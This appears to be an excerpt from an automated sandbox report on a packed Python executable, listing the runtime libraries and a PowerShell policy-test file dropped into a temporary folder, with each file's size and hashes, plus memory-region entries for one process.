                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI46602\_socket.pyd

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          81KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          dc06f8d5508be059eae9e29d5ba7e9ec

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          d666c88979075d3b0c6fd3be7c595e83e0cb4e82

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI46602\base_library.zip

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          08332a62eb782d03b959ba64013ac5bc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          b70b6ae91f1bded398ca3f62e883ae75e9966041

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8584f0eb44456a275e3bc69626e3acad595546fd78de21a946b2eb7d6ba02288

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          a58e4a096d3ce738f6f93477c9a73ddbfcb4b82d212c0a19c0cf9e07f1e62b2f477a5dd468cd31cc5a13a73b93fa17f64d6b516afef2c56d38ede1ace35cf087

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI46602\cryptography\hazmat\bindings\_rust.pyd

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          6.9MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          61d63fbd7dd1871392997dd3cef6cc8e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          45a0a7f26f51ce77aa1d89f8bedb4af90e755fa9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          ae3a2936b138a2faa4d0cd6445fae97e441b23f6fdafb1a30e60fd80c37d7df5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          c31f1f281d354acb424a510d54790ee809364b55425b1d39429e1bb7c379126578260c6f197834339a34833c90e748483aabd426295731f78fcde9580fcd8f9f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI46602\libcrypto-3.dll

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          e547cf6d296a88f5b1c352c116df7c0c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          cafa14e0367f7c13ad140fd556f10f320a039783

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI46602\libffi-8.dll

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          38KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          0f8e4992ca92baaf54cc0b43aaccce21

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI46602\python3.DLL

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          66KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          79b02450d6ca4852165036c8d4eaed1f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI46602\python312.dll

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          6.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3c388ce47c0d9117d2a50b3fa5ac981d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          038484ff7460d03d1d36c23f0de4874cbaea2c48

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI46602\select.pyd

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          29KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          92b440ca45447ec33e884752e4c65b07

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5477e21bb511cc33c988140521a4f8c11a427bcc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI46602\unicodedata.pyd

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          16be9a6f941f1a2cb6b5fca766309b2c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          17b23ae0e6a11d5b8159c748073e36a936f3316a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y0olgxdj.ojf.ps1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          60B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1356-199-0x00000260BBFE0000-0x00000260BC002000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          136KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1356-198-0x00007FFFA91C3000-0x00007FFFA91C5000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1356-214-0x00007FFFA91C0000-0x00007FFFA9C81000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10.8MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1356-211-0x00007FFFA91C0000-0x00007FFFA9C81000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10.8MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1356-210-0x00007FFFA91C0000-0x00007FFFA9C81000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10.8MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1356-209-0x00007FFFA91C0000-0x00007FFFA9C81000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10.8MB